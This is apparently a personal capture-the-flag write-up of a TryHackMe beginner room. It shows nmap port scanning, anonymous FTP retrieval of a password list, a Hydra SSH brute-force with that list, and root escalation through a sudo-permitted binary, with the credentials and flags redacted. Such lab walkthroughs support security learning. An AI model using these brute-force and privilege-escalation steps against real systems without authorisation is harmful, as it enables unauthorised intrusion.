https://tryhackme.com/room/cowboyhacker
π Thoughts after doing the room
This room was a little bit odd because I didn’t really get the L (O)MEGALUL RE. The contents of the http server didn’t play any role in the further process. Sometimes the rooms labeled as easy already require a lot of knowledge, but this one was really on the easier side.
Task 1 Living up to the title
Deploy the machine.
YEP
Find open ports on the machine
Default ports nmap fast scan
root@ip-10-10-24-237:~# IP=10.10.145.177
root@ip-10-10-24-237:~# nmap -T4 $IP
Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-29 20:27 BST
Nmap scan report for ip-10-10-145-177.eu-west-1.compute.internal (10.10.145.177)
Host is up (0.00033s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 02:CF:B3:AC:55:A7 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 16.16 seconds
Who wrote the task list?
Port 80 was open so I check if there is a website, which doesn’t reveal something directly as far as I can tell.
FTP port was also open. Check for anonymous FTP login
Download both files there
root@ip-10-10-24-237:~# ftp $IP
Connected to 10.10.145.177.
220 (vsFTPd 3.0.3)
Name (10.10.145.177:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
226 Directory send OK.
ftp> get locks.txt
local: locks.txt remote: locks.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
226 Transfer complete.
418 bytes received in 0.08 secs (5.4071 kB/s)
ftp> get task.txt
local: task.txt remote: task.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.00 secs (120.0836 kB/s)
ftp> exit
221 Goodbye.
locks.txt seems to contain passwords
root@ip-10-10-24-237:~# cat locks.txt
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
[...]
task.txt has two lines and a name we’re looking for
root@ip-10-10-24-237:~# cat task.txt
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-π€
What service can you bruteforce with the text file found?
Because of the question I’m thinking more ssh than the webserver. So I’ll try it with the new name we got and the password list.
What is the users password?
I accidentally first copied over the hydra command with the RockYou wordlist instead of the password file we found, this there is an output about a previous session.
root@ip-10-10-24-237:~# hydra -l π€ -P locks.txt $IP ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2023-03-29 20:37:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.145.177:22/
[22][ssh] host: 10.10.145.177 login: π€ password: π€
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2023-03-29 20:38:04
user.txt
It’s just in the directory when you login
π€@bountyhacker:~/Desktop$ ls
user.txt
π€@bountyhacker:~/Desktop$ cat user.txt
THM{π€}
root.txt
One of the first things I check manually is sudo -l to see if I can run anything as root.
π€@bountyhacker:~/Desktop$ sudo -l
[sudo] password for π€:
Matching Defaults entries for π€ on bountyhacker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User π€ may run the following commands on bountyhacker:
(root) /bin/π€
π€@bountyhacker:~/Desktop$
Yes. There is one. So I go to gtfobins and check the command for elevated privileges
π€@bountyhacker:~/Desktop$ sudo π€
tar: Removing leading `/' from member names
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{π€}